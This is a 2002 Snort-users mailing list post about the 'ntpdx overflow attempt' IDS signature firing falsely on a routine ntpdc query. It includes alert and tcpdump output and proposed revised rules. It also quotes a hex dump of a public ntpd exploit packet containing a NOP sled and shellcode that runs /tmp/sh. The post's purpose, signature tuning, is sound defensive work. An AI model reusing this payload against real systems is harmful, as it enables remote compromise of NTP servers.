Snort mailing list archives
ntpdx overflow attempt sig triggered by ntpdc query
From: "James-lists" <hackerwacker () cybermesa com>
Date: Sat, 14 Dec 2002 04:06:08 -0700
I was able to trigger this rule by doing "ntpdc -c peers <peer address>" Ntpdc used is the current version of NTP & NTPD by David Mills. The RON box we host set this off and the researcher pointed out to me this was just a ntpdc query from him. [**] [1:312:2] EXPLOIT ntpdx overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] 12/14-00:58:02.732689 mrtg:57985 -> tarpit:123 UDP TTL:64 TOS:0x0 ID:34983 IpLen:20 DgmLen:188 DF Len: 168 [Xref => bugtraq 2540][Xref => arachnids 492] alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx overflow attempt"; dsize: >128; reference:arachnids,492; reference:bugtraq,2540; classtype:attempted-admin; sid:312; rev:2;) My hacked rule revisions, comments please alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx overflow attempt"; dsize: >188;\ content:"|80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90|";reference:arachnids,492; reference:bugtraq,2540; classtype:attempted-admin; sid:312;\ rev:3;) or alert udp $EXTERNAL_NET any -> $HOME_NET 123 (msg:"EXPLOIT ntpdx overflow attempt"; dsize: >188;\ content:"/tmp/sh";reference:arachnids,492; reference:bugtraq,2540; classtype:attempted-admin; sid:312; rev:3;) James [root@tarpit]# ntpdc -c peers mrtg [root@mrtg james]# tcpdump -v -E type host mrtg and udp port 123 tcpdump: listening on eth0 03:19:30.262385 tarpit.58596 > mrtg..ntp: [len=160] v2 res2 strat 0 poll 2 prec 1 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig 0.000000000 rec -0.000000000 xmt -0.000000000 (DF) (ttl 64, id 31704, len 188) 03:19:30.262442 tarpit.58596 > mrtg.ntp: [len=160] v2 res2 strat 0 poll 2 prec 1 dist 0.000000 disp 0.000000 ref (unspec)@0.000000000 orig 0.000000000 rec -0.000000000 xmt -0.000000000 (DF) (ttl 63, id 31704, len 188) 03:19:30.262970 mrtg.ntp > tarpit.58596: [len=136] v2 -1s res2 strat 0 poll 2 prec 1 dist 4.000488 disp 16659.015945 ref (unspec)@8061450.042957365 orig 38.000000000 rec +10622733.000000226 xmt +83886042.254196226 (DF) [tos 0x10] (ttl 64, id 0, len 164) 03:19:30.263110 mrtg.ntp > tarpit.58596: [len=136] v2 -1s res2 strat 0 poll 2 prec 1 dist 4.000488 disp 16659.015945 ref (unspec)@8061450.042957365 orig 38.000000000 rec +10622733.000000226 xmt +83886042.254196226 (DF) [tos 0x10] (ttl 63, id 0, len 164) All other ntp query types I tried were less than len 188 Exploit, from Whitehats: This is a trace of the ntp exploit "ntpd-exp.c" found on securityfocus.com which was written by babcia padlina ltd. 04/09-12:28:17.176237 192.0.0.10:1109 -> 192.0.0.1:123 UDP TTL:64 TOS:0x0 ID:60376 IpLen:20 DgmLen:540 Len: 520 16 02 00 01 00 00 00 00 00 00 01 36 73 74 72 61 ...........6stra 74 75 6D 3D 90 90 90 90 90 90 90 90 90 90 90 90 tum=............ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ EB 1F 5E 89 76 08 31 C0 88 46 07 89 46 0C B0 0B ..^.v.1..F..F... 89 F3 8D 4E 08 8D 56 0C CD 80 31 DB 89 D8 40 CD ...N..V...1...@. 80 E8 DC FF FF FF 2F 74 6D 70 2F 73 68 90 90 90 ....../tmp/sh... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 77 F7 FF BF 77 F7 FF BF 90 90 90 90 90 90 90 90 w...w........... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ ------------------------------------------------------- This sf.net email is sponsored by: With Great Power, Comes Great Responsibility Learn to use your power at OSDN's High Performance Computing Channel http://hpc.devchannel.org/ _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- ntpdx overflow attempt sig triggered by ntpdc query James-lists (Dec 14)
- <Possible follow-ups>
- ntpdx overflow attempt sig triggered by ntpdc query james (Dec 17)